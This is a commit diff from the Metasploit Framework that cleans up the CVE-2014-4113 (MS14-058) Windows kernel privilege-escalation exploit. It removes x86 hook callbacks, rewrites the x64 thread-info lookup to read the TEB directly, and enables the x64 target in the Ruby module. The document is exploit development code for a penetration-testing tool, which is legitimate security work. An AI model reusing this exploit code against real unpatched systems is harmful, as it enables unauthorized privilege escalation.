Land zeroSteiner/metasploit-framework#9 clean up

2014-10-27 09:11:19 -04:00 · 2014-10-27 09:11:19 -04:00 · 2d76a8da4a
parent 7416c00416 0aaebc7872
commit 2d76a8da4a
4 changed files with 5 additions and 79 deletions
--- a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
+++ b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
--- a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
+++ b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@ -23,7 +23,6 @@ typedef QWORD *PQWORD;

 int WndProcClue = 0;
 int HookCallbackClue = 0;
-int HookCallbackThreeClue = 0;
 WNDPROC lpPrevWndFunc;
 DWORD MyProcessId = 0;
 DWORD OffsetWindows = 0;
@ -71,49 +70,12 @@ typedef struct _SYSTEM_MODULE_INFORMATION {
 lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
 lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;

-LRESULT __stdcall HookCallbackThree(int code, WPARAM wParam, LPARAM lParam)
-{
-	if (wParam == 4 && *(DWORD *)lParam == GetCurrentThreadId() && *(DWORD *)(lParam + 12) == 0x900516)
-		HookCallbackThreeClue = 1;
-	return CallNextHookEx(0, code, wParam, lParam);
-}

-#ifdef _M_X64
 long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
 {
 	EndMenu();
 	return -5;
 }
-#else
-LRESULT __stdcall HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
-{
-	LRESULT result;
-	DWORD v5;
-
-	if (Msg == 0x1EB)
-	{
-		v5 = GetCurrentThreadId();
-		SetWindowsHookExA(9, HookCallbackThree, 0, v5);
-		SendMessageA(hWnd, 0, 0x900516u, 0);
-		UnhookWindowsHook(9, HookCallbackThree);
-		if (HookCallbackThreeClue)
-		{
-			EndMenu();
-			result = CallWindowProcA(lpPrevWndFunc, hWnd, 0x1EBu, wParam, lParam);
-		}
-		else
-		{
-			EndMenu();
-			result = -5;
-		}
-	}
-	else
-	{
-		result = CallWindowProcA(lpPrevWndFunc, hWnd, Msg, wParam, lParam);
-	}
-	return result;
-}
-#endif

 LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
 #ifdef _M_X64
@ -146,47 +108,10 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {

 #ifdef _M_X64
 QWORD MyPtiCurrent(void) {
-	struct _IMAGE_DOS_HEADER *hUser32;
-	PIMAGE_DOS_HEADER dosHeader;
-	FARPROC tmpProcAddress;
-	PIMAGE_NT_HEADERS ntHeader;
-	QWORD imageBase;
-	BYTE currentByte;
-	QWORD sizeOfImage;
-	int counter;
-	PIMAGE_DOS_HEADER(*v8)(void);
-	PIMAGE_DOS_HEADER *v10;
+	void *teb = (void *)__readgsqword(0x30);
+	QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));

-	v10 = 0;
-	hUser32 = LoadLibraryA("user32.dll");
-	dosHeader = hUser32;
-	if (hUser32) {
-		tmpProcAddress = GetProcAddress(hUser32, "AnimateWindow");
-		if (tmpProcAddress && dosHeader->e_magic == 'ZM') {
-			ntHeader = (PIMAGE_NT_HEADERS)((BYTE *)dosHeader + dosHeader->e_lfanew);
-			imageBase = ntHeader->OptionalHeader.ImageBase;
-			currentByte = *(BYTE *)tmpProcAddress;
-			sizeOfImage = imageBase + ntHeader->OptionalHeader.SizeOfImage;
-			counter = 0;
-			do {
-				if (currentByte == 0xe8) {
-					v8 = (FARPROC)((char *)tmpProcAddress);
-					v8 = (FARPROC)((QWORD)v8 + counter);
-					v8 = (FARPROC)((DWORD)v8 + *(DWORD *)((char *)tmpProcAddress + counter + 1));
-					v8 = (FARPROC)((QWORD)v8 + 5);
-					if (((QWORD)v8 >= imageBase) && ((QWORD)v8 <= sizeOfImage)) {
-						v10 = (PIMAGE_DOS_HEADER *)v8();
-						break;
-					}
-				}
-				counter++;
-				currentByte = *((BYTE *)tmpProcAddress + counter);
-			} while (counter <= 70);
-		}
-		FreeLibrary(dosHeader);
-		dosHeader = (PIMAGE_DOS_HEADER)v10;
-	}
-	return (QWORD)dosHeader;
+	return Win32ThreadInfo;
 }
 #else
 DWORD __stdcall MyPtiCurrent() {
--- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
+++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Local
          'juan vazquez', # msf module (x86 target)
          'Spencer McIntyre' # msf module (x64 target)
        ],
-      'Arch'           => ARCH_X86,
+      'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
@ -113,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Local
    else
      dll_file_name = 'cve-2014-4113.x64.dll'
    end
+
    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
    library_path = ::File.expand_path(library_path)